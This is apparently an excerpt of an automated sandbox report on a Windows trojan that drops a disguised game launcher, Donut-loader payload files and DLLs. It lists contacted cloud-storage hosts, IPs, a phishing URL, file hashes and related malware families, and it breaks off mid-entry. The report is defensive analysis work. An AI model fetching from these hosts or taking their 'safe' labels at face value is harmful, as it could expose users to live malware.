http://www.microsoft.co	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2634268041.00000000235E0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.9.dr	false		high
https://aka.ms/winsvr-2022-pshelpxk	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pesterxk	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2510566311.0000000015989000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.pngxk	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlxk	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000058F1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2369177126.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
183.66.100.45	cq.file.myqcloud.com	China	134420	CHINATELECOM-CHONGQING-IDCChongqingTelecomCN	false
149.115.250.19	unknown	United States	174	COGENT-174US	false
159.75.57.35	gz.file.myqcloud.com	China	1257	TELE2EU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592740
Start date and time:	2025-01-16 13:34:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U6c47#U8054#U652f#U4ed8.exe renamed because original name is a hash value
Original Sample Name:	.exe
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@13/25@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 96 Number of non-executed functions: 213
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.107.253.45, 4.245.163.56, 173.222.162.64, 40.126.32.140
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target APP.exe, PID 4176 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:35:09	API Interceptor	208x Sleep call for process: #U6c47#U8054#U652f#U4ed8.exe modified
07:35:23	API Interceptor	24x Sleep call for process: APP.exe modified
07:35:38	API Interceptor	2x Sleep call for process: WerFault.exe modified
13:35:35	Task Scheduler	Run new task: GamePlusPlus path: C:\Program Files\Weekplus\GamePlusPlus.exe s>1

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
183.66.100.45	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse
	PDF.exe	Get hash	malicious	Unknown	Browse
	PDF.exe	Get hash	malicious	Unknown	Browse
159.75.57.35	#U67e5_-uninstall.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cq.file.myqcloud.com	cZ3Ju8l4ia.dll	Get hash	malicious	CobaltStrike	Browse	183.66.100.51
	cZ3Ju8l4ia.dll	Get hash	malicious	CobaltStrike	Browse	183.66.100.51
	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse	183.66.100.45
	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse	183.66.100.51
	PDF.exe	Get hash	malicious	Unknown	Browse	183.66.100.45
	PDF.exe	Get hash	malicious	Unknown	Browse	183.66.100.45
	https://docusign23022023mic-1312962597.cos.ap-chongqing.myqcloud.com/docu.htm#craig.barber@abrholdings.com	Get hash	malicious	Unknown	Browse	114.117.223.33
gz.file.myqcloud.com	#U67e5_-uninstall.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	WhaleInstall.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	uMGZmwaXI2.exe	Get hash	malicious	BlackMoon	Browse	159.75.57.69
	LisectAVT_2403002B_246.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	LisectAVT_2403002B_246.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse	159.75.57.35
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINATELECOM-CHONGQING-IDCChongqingTelecomCN	5.elf	Get hash	malicious	Unknown	Browse	119.87.203.228
	4.elf	Get hash	malicious	Unknown	Browse	113.250.192.151
	6.elf	Get hash	malicious	Unknown	Browse	119.86.160.80
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	113.250.232.207
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	119.87.53.244
	spc.elf	Get hash	malicious	Mirai	Browse	119.87.203.243
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	113.250.192.176
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	119.86.159.84
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	183.66.98.199
	rebirth.arm5.elf	Get hash	malicious	Mirai, Okiru	Browse	113.251.22.35
TELE2EU	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	159.72.74.6
	i686.elf	Get hash	malicious	Mirai	Browse	145.235.165.77
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	83.181.157.161
	178.215.238.129-x86-2025-01-15T04_59_51.elf	Get hash	malicious	Mirai	Browse	159.75.64.242
	x86.elf	Get hash	malicious	Unknown	Browse	213.102.17.215
	x86_64.elf	Get hash	malicious	Unknown	Browse	145.235.229.203
	meth6.elf	Get hash	malicious	Mirai	Browse	159.75.64.46
	5.elf	Get hash	malicious	Unknown	Browse	213.103.0.253
	res.sh4.elf	Get hash	malicious	Unknown	Browse	83.185.2.149
	6.elf	Get hash	malicious	Unknown	Browse	83.179.44.200
COGENT-174US	la.bot.x86_64.elf	Get hash	malicious	Mirai	Browse	38.60.221.89
	mpsl.elf	Get hash	malicious	Unknown	Browse	209.39.21.238
	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Get hash	malicious	FormBook	Browse	149.104.185.93
	87.121.112.22-arm-2025-01-16T06_52_38.elf	Get hash	malicious	Unknown	Browse	149.11.92.108
	87.121.112.22-mips-2025-01-16T06_52_39.elf	Get hash	malicious	Unknown	Browse	38.198.201.28
	Personliche Nachricht fur Friedhelm Hanusch.pdf	Get hash	malicious	Unknown	Browse	143.244.208.184
	i586.elf	Get hash	malicious	Unknown	Browse	38.32.85.52
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	140.242.24.248
	sora.mips.elf	Get hash	malicious	Mirai	Browse	38.185.133.98
	sora.arm.elf	Get hash	malicious	Mirai	Browse	38.25.43.119

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Get hash	malicious	Snake Keylogger	Browse	159.75.57.35 183.66.100.45
	U23BGA2025REQ.exe	Get hash	malicious	MassLogger RAT	Browse	159.75.57.35 183.66.100.45
	Notice_bill_of_lading_number_HAWB_771434342326.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	159.75.57.35 183.66.100.45
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	159.75.57.35 183.66.100.45
	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	159.75.57.35 183.66.100.45
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	159.75.57.35 183.66.100.45
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	159.75.57.35 183.66.100.45
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	159.75.57.35 183.66.100.45
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	159.75.57.35 183.66.100.45
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	159.75.57.35 183.66.100.45

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	5.239611965241187
Encrypted:	false
SSDEEP:	96:eGD4Dp824dwjFYi5YTycK8D5fyQ92XD9TKv7VZJzNt:JMtJYiYTJ/D5TW9oPr
MD5:	53F534B5BE5BD54C0BBD6168C510776E
SHA1:	C128895D5F59CFAE7A3E6FDB7AC2BC8B72520E39
SHA-256:	0BFDF16376D828D4BA62419D58EE651C0FD7FEFBB6B2BF6D0D1114C06ED7B85E
SHA-512:	602F658C55477D534E9B244D4947108D2218113CC1006EFF1380F945330A7E14B05BEB38A5C038B76DC9A9EC601B97D12CAC39970EA83B54D46B1F9C57791584
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....g.........."...................... .....@..... .......................`............@...@......@............... ...............................@..............................D+............................................................... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..BH.......0!......................................................................F(.....(....o.......0..........(......o.....o......o.....o.....o....r...po.....o......o....s......o......+...o.........o....o ...&..o!...-.....,...o".....o.............J.$n.......0..........r...p..(......(....&..(#......BSJB............v4.0.30319......l.......#~..\...h...#Strings............#US.h.......#GUID...x.......#Blob...........G.........%3........................#...............................

C:\Program Files\Weekplus\GamePlusPlus.exe

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251488
Entropy (8bit):	6.595967056502266
Encrypted:	false
SSDEEP:	6144:oQQ45u4vQmuAFiTdx9VieWhIBpyHUN7wkb5:hDQt73x/6Y7pl
MD5:	8038EBB15EC202AD0A25564E55CDF32D
SHA1:	588AB42D8C7F1515BC1100868C62C1A291922906
SHA-256:	294D514FC9483D8DAE8EBFC071F2AC2935936A3EF5422071F44AFFE55E4EE97A
SHA-512:	DBC09AC53C439DEB84411D58F91D718257F881AEABBAC6E0526A23E95B8C9FBE345D50127D9CD1FC0E0EE589059FAEAFF7F068E0598CDCB4B0DF8CC8B31012A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@.......................................VLV.........dtWg.4....3Hlq].s8.N....uj..g..3u..J.u.^o..A.ht..+.}.4...F..C.....}:.~.~`...]T.jV..V.u.c..e.(_f..U..6.^./B}i...\:.u......O.@b...........................................................................PE..d...@tWg.........."............................@.............................0......y.....`..........................................................`.......@..H.......`,... ..p....f..T....................g..(....f............... ..(............................text............................... ..`.rdata....... ......................@..@.data...p_..........................@....pdata..H....@... ..................@..@.rsrc........`......................@..@.reloc..p.... ......................@..B........................................................................................................................................................................................................................

C:\Program Files\Weekplus\mpclient.dat

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	data
Category:	dropped
Size (bytes):	334805
Entropy (8bit):	7.979290617781527
Encrypted:	false
SSDEEP:	6144:+QcbSMsxv8q5WH3/A18ZPXY7QVg9b7XxnJs5myz+nEutX7I6ysB:+QjMsxvuH3/AI7Vg9PXxnby6nEsI6JB
MD5:	8D64D97085F6AA11D1375879095D996C
SHA1:	8D0E50F76AE515F024B349DD3B893ABDC5D6F75F
SHA-256:	57C15F61210E60E0204CF5BD0AAA0984BAF363B7D7FB82DB576DA919C223DC64
SHA-512:	E6D8E2223018B2CCC95A0EAC4434EB33363BFA2355770B23108D27C72B06E7825B00A3A5F7D0FCBB5886049275F3DF5C726B4CEBE5F4AC9034ECCB2EE9B339DC
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files\Weekplus\mpclient.dat, Author: unknown
Reputation:	low
Preview:	..............l..pu.k.\|.s....;.,.N_ZI)&.......8.K9yQ.n.s.\S\.uEe1.K..A....7.._..6.\.;M.R..(K.i5..E.q..zx..0......0....=...P.Cn.h.....h.\|........V}.B.p.....7Td4.!...y9.<,.z.M.V>--..s\....t...f.qP,......F..FNo.g8hn...x1+ZO...0.ll.)I...mJ....4 ..8....83r.h; .`y.@...K1_...U......8h..:g..P..by..]F2c{.0.\..F....-.....RWYf..`.....c.C.!.R.E._\|O`$.[.JH.3.s#.KC.:......P...&..j..D..B.....B...n.W%4....T..t/xi..3.D....W..4\2.%ek0.W.z6..N.p....C.. u.Tn;.BitV..K...i'......OY..... .......c0...k:..%'.]T..d...e....QV....R........3)........Z....................g.....?...F..H.k....K..]3g.....9.`.^.+.`k+f..!jvl..y......A;.73...BMs.Q....t+.j...(.l.....G....J\.%.i.>..m`....Y....).......).s.l.{..= EJ..&....G<....GZ..}..:.u..E.....}.\..G?.....X.VC^E..).{..r00$W...Z..g}.w.j..c._...p...\|6..O.@'..ei..).D..B....I..lzj....}<..h....W%..%^..f....bw>R.b......_..H..at..~...0......6....:..#..w....2zr..A.....=..t.Q..D..:e{\U..]&...ME*.dO.T...<...G..h......\."n.bSp....;

C:\Program Files\Weekplus\mpclient64.dat

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	data
Category:	dropped
Size (bytes):	38357
Entropy (8bit):	7.207891252927893
Encrypted:	false
SSDEEP:	768:0L43tvq/w0F813CGwM1hltW9cS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:73oF8QGwM1gcS7i9u6yeNejY6yFOB
MD5:	064A2C07C19EB983C114B318216E2492
SHA1:	FB8A8CB6D37AFE380FB1151512BE33DB06E4926C
SHA-256:	2E5A9A6E7D7B0FB13F1889ED29E9652814033DE163B3DB5CE634C2196474102F
SHA-512:	AF25A9A7793F7FB543AD350FAC27220E0541F51C0F667FBE25395820D29BD57748FFB3505062E82B70AD169D9A2B17D68FA07426C8B9E2BBF0732E338A260BEE
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files\Weekplus\mpclient64.dat, Author: unknown
Reputation:	low
Preview:	..3...3....;^U..g.O..mFb...1\|s..."4m..........8..X...dt.#..M)=...Q.T.p.t'+<...."028..w..4.C4.vA5.$QF .5......].."..._.......m...k...~..$...4-..K.....1#..D0.S....ql......i...2.7...%..<c.P.@4}.A.~Hbm-...F........b.JY..2.6....8....l..<.z...-.l..zdRE.j.>...w...'}...iW{<.t.W.}..p..<X..i.w..5....K..q....";.b.Y.f. ...t+...tb1....ES@.K..#..<,.`....4.tn^....' .;...9Ci..e5@. .Y.9E..x!"p1>.d.`M.0..c....._..H....7....X?...P.T.-uf4#.2.^bs.K.J....e......KN.am./..v.........G........._q..........].P.H.f..._.,...JG.,%.L...gj.b.pW..X^)..;O....................@...,.....c%T..m.@M..!#.g5-.9...z...3.s......~.\|V...km..3Ba...'....>l.P.,.=<m4...uC..W.j..W.%.,XR.`R%>..d.4..,ut./}S.........`...[...b/Q....G.f..;`}D.".s..K...@...2.,@l.l/J..y.1#..K...2.....\.9..8...m.w..>.g.\...L.:C.J.1i....(T.<..........J..G..z....F.<.$F.M.I........R....J..g%..\.OS.C.....Hf...........O.v{.9M....}.,.2..3.R.u...-...........!......s....u.;..^......D.=C.....r...C...cW.q.7).:..B..k5.&.

C:\Program Files\Weekplus\openvr_api.dll

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	379904
Entropy (8bit):	5.713104943501391
Encrypted:	false
SSDEEP:	6144:Z9AtI+wngo0iXh3/DQ7oAsjn/hyMBU2zJfg7BsqJ5t:Z9GI+wngo0iXh3/h1BUmJe
MD5:	366710963F426B54B6E06657B26A5CBB
SHA1:	A22A7313BE3F311FF14E9FCB406C7F7C5A9CF08C
SHA-256:	EF1DAFE72F4EDC90E500A5E5FEF04479F3BFE54AF856D00C046028799058E8D2
SHA-512:	AC1FF25DAEA694F33C314A4E98D5E8998554AD096CEB054F8F152770A5A235F184FDC0BF68B944FCE0C791FF5369349E4701D047DBBFB83E2720F26DC457738C
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ..NA..NA..NA..<....A..<...BA..<...FA..^..GA..^..@A..^..kA..<...KA..NA..(A.....OA.....OA....v.OA.....OA..RichNA..................PE..d...=W.g.........." ...).(.......... ........................................@............`.............................................@... ...<.... ...........5...........0...... f..8............................d..@............@...............................text...M&.......(.................. ..`.rdata..xQ...@...R...,..............@..@.data...P#...........~..............@....pdata...5.......6..................@..@.fptable............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Program Files\Weekplus\steam_api64.dll

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	301928
Entropy (8bit):	6.481950937605796
Encrypted:	false
SSDEEP:	6144:LV5AmlcQZIcT8e4RO882MnuyqO2CHKOcJra:h5AmllZAQuyH2CqFda
MD5:	543515A345CC88CB93413953F06F34A4
SHA1:	0C67FF54AFA0E53F82659ABEEEA0D8AB1DCAD1ED
SHA-256:	DCFAA13AA419A0641917205957DBE15AA472E7CF09A28CF8D3CF429598E67799
SHA-512:	7010AB1549480FF00A66FD90A7EDB7E6028DE234DBC6FC7FC12BFB528174F84850B6713A3DE0797FC8BCDFAB5B2A52846E97B370BFA24185EAD1F64B7A0132BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@.......................................VLV......n...\|.di..{.g..p...?\|w.....(U.....R...g\...4.Bc....C.w..s~...Xuf..n..i./.-@.$...B`.9.N...G.l......Y...F........f...B..rV....C.....)................................................PE..d....\|.d.........." .....h..........P.........@;....................................;q....`..........................................G.......+..P............p..$$...n..h-......T.......T.......................(...0...8............................................text....g.......h.................. ..`.rdata...............l..............@..@.data........@.......$..............@....pdata..$$...p...&...6..............@..@_RDATA...............\..............@..@.rsrc................^..............@..@.reloc..T............f..............@..B........................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U6c47#U8054#U65_3d90b833433f75c511439ed5e6d61f102049a62d_6b7b5bfd_b5b50cd5-d1c3-46b1-9850-a9839225552b\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4709024029495006
Encrypted:	false
SSDEEP:	192:mIn12v0TYpPxbaWzvlPLyIWwwx2zuiF8PZ24lO8O:112cT+Pxba4NDDCx2zuiFEY4lO8O
MD5:	6D09F44B82D7161134FE5F06E2289F69
SHA1:	478B8862CD9612A8511B5CB715E1FC6CAFA0FF33
SHA-256:	5DC324793BCF1BCCBCFD55B0E27ED9CAF63A31AC03417B73913FAE0487B3A2AB
SHA-512:	22D60902C37DDE712C00C87EB7A64B4DC78A69CE48635C9E7D805C386A01078C6F4B53CBCE009BBB0830D2AFA45B656C1726475EAA7A132CEC984C74DD16684B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.5.0.4.5.3.5.0.5.6.1.4.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.5.0.4.5.3.6.1.8.1.1.5.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.b.5.0.c.d.5.-.d.1.c.3.-.4.6.b.1.-.9.8.5.0.-.a.9.8.3.9.2.2.5.5.5.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.3.d.9.0.6.4.-.e.2.c.e.-.4.5.0.3.-.9.a.2.1.-.8.f.7.7.4.5.e.f.2.e.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.#.U.6.c.4.7.#.U.8.0.5.4.#.U.6.5.2.f.#.U.4.e.d.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.M.M.5.5.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.8.-.0.0.0.1.-.0.0.1.5.-.a.c.9.9.-.9.7.1.1.1.3.6.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.b.b.4.a.1.5.c.a.3.d.6.f.5.e.0.d.1.8.1.6.2.9.f.d.b.6.7.c.6.e.e.0.0.0.0.0.0.0.0.!.0.0.0.0.c.8.9.d.8.4.a.4.0.0.7.5.a.2.c.5.3.d.a.3.b.e.5.e.b.1.7.e.3.f.d.9.5.d.6.b.7.c.c.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_a30617e1a5ff2d8bd3ddff2e634754382565ca_54de7261_34cb2866-c026-4add-a4f0-44d33bca9f3f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	TeX document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.117302124763329
Encrypted:	false
SSDEEP:	192:NwZ7016/g0hT88WS2jdvSG7Xo3ROzuiF8PZ24lO83e:2Z7+y7ho8yjl8YzuiFEY4lO8u
MD5:	EDA0A1B9DF85604BC1A6061821C3CED4
SHA1:	4C291ADB13BC3048E5DA2AB3B9B5888B17A36C71
SHA-256:	339972F0E64A2C5FFA064283B7E15B6F9D94D77191FC6BF492F8899853153C08
SHA-512:	2CD02988B8F00938B6AF4AD8FCC5CB73AE82512EB3B3E3D83A4FFE053C97B9180BF03DB534BC6C58F3C1EEBB91E83E2ECCEA48FBB70AF0F66A3D3C5BB9A90E84
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.5.0.4.5.3.7.1.8.9.8.7.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.5.0.4.5.3.7.6.6.7.8.7.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.c.b.2.8.6.6.-.c.0.2.6.-.4.a.d.d.-.a.4.f.0.-.4.4.d.3.3.b.c.a.9.f.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.7.a.b.6.9.7.-.0.f.7.3.-.4.0.8.8.-.8.f.e.e.-.b.a.c.5.3.5.8.c.6.2.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.G.a.m.e.P.l.u.s.P.l.u.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.r.d.a.s.h.b.o.a.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.8.4.-.0.0.0.1.-.0.0.1.5.-.8.d.e.a.-.e.7.2.3.1.3.6.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.c.4.0.7.0.a.d.a.1.c.7.3.5.b.c.9.d.0.0.b.a.2.b.a.c.6.2.5.1.2.c.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.8.a.b.4.2.d.8.c.7.f.1.5.1.5.b.c.1.1.0.0.8.6.8.c.6.2.c.1.a.2.9.1.9.2.2.9.0.6.!.G.a.m.e.P.l.u.s.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA028.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jan 16 12:35:35 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	1094152
Entropy (8bit):	2.1738075414912554
Encrypted:	false
SSDEEP:	6144:moHjVsbErVEvq/P3Qg9pT1JqTKZ/+JDhPLNnaFbz:moHuqHQY308mJZJaV
MD5:	A7BC8CD4667328D13B534A2C9BA96438
SHA1:	AA47F9AA329B052D21A47875CC32BC7D55D872DD
SHA-256:	225C0CF014B766C0A8256AEE0D487B5F1B21428491904D933A71651C420BAB12
SHA-512:	CBC9D5DCA6583983881EE5073632238B6861BFA5FF5A7513BE5105A904591F8216938AB1E28882D27DEFB5FBCC540AFE631C8488D9C1540AB38CB70620C85A95
Malicious:	false
Preview:	MDMP..a..... ..........g............D............-..d............9......@....<.......i..............l.......8...........T...........Xv...;...........N...........P..............................................................................eJ......hQ......Lw......................T.......X......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2F8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8886
Entropy (8bit):	3.721542796257587
Encrypted:	false
